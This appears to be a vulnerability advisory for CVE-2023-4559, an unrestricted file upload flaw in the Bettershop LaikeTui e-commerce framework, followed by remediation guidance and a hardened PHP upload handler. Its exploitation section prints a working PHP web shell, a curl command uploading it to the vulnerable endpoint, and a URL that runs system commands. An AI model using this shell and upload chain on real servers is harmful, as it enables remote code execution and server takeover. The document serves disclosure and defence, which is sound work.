CVE-2023-4559 - Critical Unrestricted File Upload Vulnerability in Bettershop LaikeTui Explored

A critical security weakness has been found in Bettershop LaikeTui, a rolling-release e-commerce framework. The vulnerability, tracked as CVE-2023-4559, affects the file upload feature accessible through index.php?module=api&action=user&m=upload via a POST request. This flaw allows attackers to upload arbitrary files without restriction, enabling remote code execution and compromising the entire server. As the platform runs on continuous delivery, affected and patched versions are not clearly stated.

Original Reference:
VulDB: VDB-238160 - Bettershop LaikeTui Unrestricted Upload

What’s the Problem?

The problem lies in the POST request handler for file uploads. There are no effective checks on what types of files can be uploaded. Attackers can send specially crafted requests to this endpoint and upload dangerous files, such as web shells, which the server will then execute whenever these files are accessed.

- Remotely exploitable: The flawed upload endpoint is accessible over the internet.

- No authentication: The vulnerability exists before any authentication takes place, or the uploading functionality is exposed to all users, including unauthenticated ones.

Exploiting CVE-2023-4559 (with Example)

Here’s how a typical attack might look. Assume Bettershop LaikeTui is running at example.com.

1. Craft a Malicious PHP Web Shell

```php
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>
```

Save this as shell.php on your attacker machine.

2. Upload the File with curl

```bash
curl -X POST -F 'file=@shell.php' 'http://example.com/index.php?module=api&action=user&m=upload'
```

3. Find the File’s URL

After upload, many applications respond with the path or make uploads accessible at predictable locations, like /uploads/. Try accessing:

http://example.com/uploads/shell.php

4. Run System Commands Remotely

http://example.com/uploads/shell.php?cmd=whoami

This command should reveal the web server's user. You now *fully control the server* as that user.

- Remote Code Execution: Attackers can run any PHP code on your server.

- Privilege Escalation: Once inside, attackers can look for ways to become root or pivot to other systems.

How to Fix

Since Bettershop LaikeTui uses a rolling release, there are no fixed version numbers. Here’s what administrators must do:

Validate File Types:

Do not trust the client-supplied `type` field in `$_FILES`; sniff the uploaded bytes and compare the result against an allowlist:

```php
$allowed_types = ['image/jpeg', 'image/png'];

// Check the actual content, not the client-supplied $_FILES['file']['type']
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime  = $finfo->file($_FILES['file']['tmp_name']);

if (!in_array($mime, $allowed_types, true)) {
    die("Invalid file type.");
}
```

Move Uploads Outside Web Root:

Save uploads in a directory not accessible from the web, and serve with scripts that never execute uploaded files.

Disable Script Execution in the Upload Directory:

If uploads must stay under the web root, tell Apache (for example in that directory's .htaccess) to stop treating PHP files there as executable scripts:

```apache
RemoveHandler .php .phtml .php3
```
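The following is an added example of an upload handler that applies the fixes above together; it is not Bettershop LaikeTui's code. It requires an authenticated session, validates the sniffed MIME type against an allowlist, discards the client-supplied filename, stores the file under a random name in a directory outside the web root, and serves it back as static data with a fixed Content-Type so it can never be executed. The storage path, the `user_id` session key, and the `file` and `id` parameter names are assumptions.

```php
<?php
// Added example (not Bettershop LaikeTui's code): a hardened upload handler.
// Directory, session key and parameter names below are assumptions.
declare(strict_types=1);

// Assumed: a directory OUTSIDE the web root, writable only by the web server user.
const UPLOAD_DIR = '/var/app-data/uploads';
const MAX_BYTES  = 5 * 1024 * 1024;

// Allowlist keyed by the *sniffed* MIME type, mapping to the only extension we will write.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Validate one entry from $_FILES and store it under a random name outside the web root.
 * Returns the opaque storage id on success, throws RuntimeException on any failure.
 */
function store_upload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing.');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('File too large.');
    }
    // Only accept files that really arrived via HTTP POST.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file.');
    }
    // Never trust $file['type'] (client-supplied); sniff the bytes instead.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('Invalid file type.');
    }
    // For images, additionally require that the image decoder accepts the file.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a valid image.');
    }
    // Discard the client-supplied name entirely; the server chooses name and extension.
    $id   = bin2hex(random_bytes(16));
    $dest = UPLOAD_DIR . '/' . $id . '.' . ALLOWED[$mime];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file.');
    }
    chmod($dest, 0640); // data only, never executable
    return $id;
}

/**
 * Serve a stored upload by id. The id must match a strict pattern, so no path
 * components can be smuggled in, and the bytes are sent as static content with a
 * fixed Content-Type, so nothing in the file is ever interpreted as PHP.
 */
function serve_upload(string $id): void
{
    if (!preg_match('/^[a-f0-9]{32}$/', $id)) {
        http_response_code(404);
        return;
    }
    foreach (ALLOWED as $mime => $ext) {
        $path = UPLOAD_DIR . '/' . $id . '.' . $ext;
        if (is_file($path)) {
            header('Content-Type: ' . $mime);
            header('X-Content-Type-Options: nosniff');
            header('Content-Disposition: inline; filename="' . $id . '.' . $ext . '"');
            header('Content-Length: ' . (string) filesize($path));
            readfile($path);
            return;
        }
    }
    http_response_code(404);
}

// Request routing (parameter and session key names are assumptions).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    session_start();
    // Uploads are only accepted from an authenticated user.
    if (empty($_SESSION['user_id'])) {
        http_response_code(401);
        exit;
    }
    header('Content-Type: application/json');
    try {
        echo json_encode(['id' => store_upload($_FILES['file'])]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
} elseif (isset($_GET['id'])) {
    serve_upload((string) $_GET['id']);
}
```

Because the server never writes a file with a script extension, never exposes the upload directory directly, and always serves stored content with a fixed image Content-Type, an uploaded web shell like the one shown earlier is rejected at the MIME check and, even if validation were bypassed, would never be executed.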

References & Further Reading

- VulDB: Bettershop LaikeTui Unrestricted Upload
- OWASP Unrestricted File Upload
- PHP: Handling File Uploads

Final Thoughts

CVE-2023-4559 is a classic example of how overlooking file upload validation can lead to a full-system compromise. If you run Bettershop LaikeTui, patch immediately, and never allow user-supplied files to be directly accessible or executable. Always assume attackers will find these weaknesses.

Stay safe, and audit your web application’s upload features frequently!

Timeline

Published on: 08/27/2023 23:15:00 UTC
Last modified on: 08/29/2023 18:16:00 UTC